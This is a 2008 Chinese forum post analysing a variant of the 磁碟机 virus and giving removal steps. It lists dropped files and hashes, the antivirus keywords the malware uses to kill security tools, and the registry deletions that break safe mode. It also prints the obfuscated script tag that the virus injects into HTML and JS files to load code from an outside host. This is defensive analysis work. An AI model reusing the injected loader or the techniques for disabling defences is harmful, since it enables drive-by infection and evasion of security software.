作者:清新阳光??????????????????????????????????????????????????????????? ( )
日期:2008/01/01???????????????????????????????????????????????????????? (转载请保留此声明)
最近磁碟机新变种肆虐,此变种几乎把现有所有的安全工具都毙掉了,导致几乎全部不能使用,并且感染exe(包括rar中的exe文件)html等网页文件,js脚本文件,且十分顽固,采用进线程相互守护等多种技术,可谓罪恶多端的一个病毒。
下面为此病毒的简要分析和查杀方法
File: pagefile.pif
Size: 88576 bytes
Modified: 2007年12月28日, 16:55:16
MD5: 2C6F3E41B1E909E795B5BCE70B3A44CC
SHA1: 3809D504ABC65D891CB0281BD9B599EA265C406C
CRC32: 225B0B61
1.病毒运行后,生成如下文件
C:\WINDOWS\system32\Com\LSASS.EXE
C:\WINDOWS\system32\Com\netcfg.000
C:\WINDOWS\system32\Com\netcfg.dll
C:\WINDOWS\system32\Com\SMSS.EXE
C:\WINDOWS\system32\894729.log
C:\WINDOWS\system32\dnsq.dll
C:\WINDOWS\system32\ntfsus.exe
C:\Documents and Settings\All Users\「开始」菜单\程序\启动\~.exe
或者在C:\Documents and Settings\用户名\「开始」菜单\程序\启动下面
netcfg.dll负责注入IE并连接网络下载木马
并注册为浏览器加载项
[IfObj Control]
{D9901239-34A2-448D-A000-3705544ECE9D} <C:\WINDOWS\system32\com\netcfg.dll, 506>
dnsq.dll会插入一些进程,并监控C:\WINDOWS\system32\Com\LSASS.EXE,如果该进程被结束,则立即恢复。
而且会监控~.exe,如果该文件被删除,立即重写。
894729.log即pagefile.pif文件
之中还会在C盘生成一个驱动,该驱动应该是用于提升权限所用
各个盘下面生成pagefile.pif和autorun.inf
2.通过查找窗口文字和和获得窗口线程进程ID等函数(GetWindowThreadProcessID)监控指定文字的窗口,之后会发送消息关闭窗口或者通过Terminate process函数结束进程,可能涉及的关键字如下:
avast
firewall
狙剑
bitdefender
escan
ewido
*升级
sreng 介绍
monitor
微点
费尔
antivir
金山
360anti
360safe
avg
dr.web
云
墙
升
瑞
mcagent
最终的结果是很多安全工具和杀毒软件不能使用,包括我们常用的Xdelbox,sreng,Icesword以及Icesword修改版…
该部分具体分析还请各位大大们指点…
3.以独占方式禁止读取各盘下面的根目录下面的pagefile.pif,autorun.inf,C:\boot.ini,C:\Windows\system32\drivers\hosts
C:\boot.ini不能写则Xdelbox等软件被废掉。
4.破坏安全模式
删除如下键
HKLM\SOFTWARE\Policies\Microsoft\Windows\Safer(和安全模式有关?)
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
5.删除HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run键
6.破坏显示隐藏文件
HKU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden改为0×00000000
7.感染非系统分区下面部分exe文件和rar,zip压缩包内的exe文件
8.感染非系统分区下面的htm,html等网页文件
在其尾部加入<script src=”http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/*”></script>的代码
感染js等脚本文件
在其尾部加入document.write(“<ScRiPt src=’http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/*’></sCrIpT>”);的代码
查杀方法:
下载sreng:http://download.kztechs.com/files/sreng2.zip
Icesword:http://mail.ustc.edu.cn/~jfpan/download/IceSword122cn.zip
经过以上分析发现病毒十分顽固,但貌似强大的病毒背后却有着致命的弱点,它只通过~.exe启动自身,没有其他启动项,所以我们xx可以通过映像劫持处理这个病毒。
1.将下列文字复制到记事本中,并保存为reg文件
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\~.exe]
“Debugger”=”清新阳光”
双击导入注册表
重启计算机
2.重启后我们会发现病毒被困死了^_^
现在可以轻松的灭掉它们了
打开Icesword
点击左下角文件 按钮
删除如下文件
C:\WINDOWS\system32\Com\LSASS.EXE
C:\WINDOWS\system32\Com\netcfg.000
C:\WINDOWS\system32\Com\netcfg.dll
C:\WINDOWS\system32\Com\SMSS.EXE
C:\WINDOWS\system32\894729.log
C:\WINDOWS\system32\dnsq.dll
C:\WINDOWS\system32\ntfsus.exe
C:\Documents and Settings\All Users\「开始」菜单\程序\启动\~.exe(一定不要忘记)
或C:\Documents and Settings\用户名\「开始」菜单\程序\启动\~.exe
以及各个分区下面的pagefile.pif和autorun.inf
3.打开sreng
系统修复 - Windows Shell/Ie 全选 – 修复
系统修复 - 高级修复 修复安全模式
系统修复 — 浏览器加载项
删除[IfObj Control]
{D9901239-34A2-448D-A000-3705544ECE9D} <C:\WINDOWS\system32\com\netcfg.dll, 506>
4.使用杀毒软件全盘杀毒,修复受感染的exe文件(如果杀毒软件暂不能认出这个病毒,请暂时不要打开非系统分区下的exe以及压缩包内的exe文件!!!)
5.修复受感染的htm等网页文件
由于抓住了病毒作者的一个疏忽,所以以上查杀方法可能很快就会失效,所以在此征集更好的查杀方法,查找病毒的软肋,并希望大家在使 用现在已有的使用比较广泛的工具中(sreng,Icesword,PE,Xdelbox…)研究查杀方案,不要再放出更新的杀毒工具来,那样会很快 被病毒杀掉而致以后中毒了真的就”无药可救了”…
发表你的看法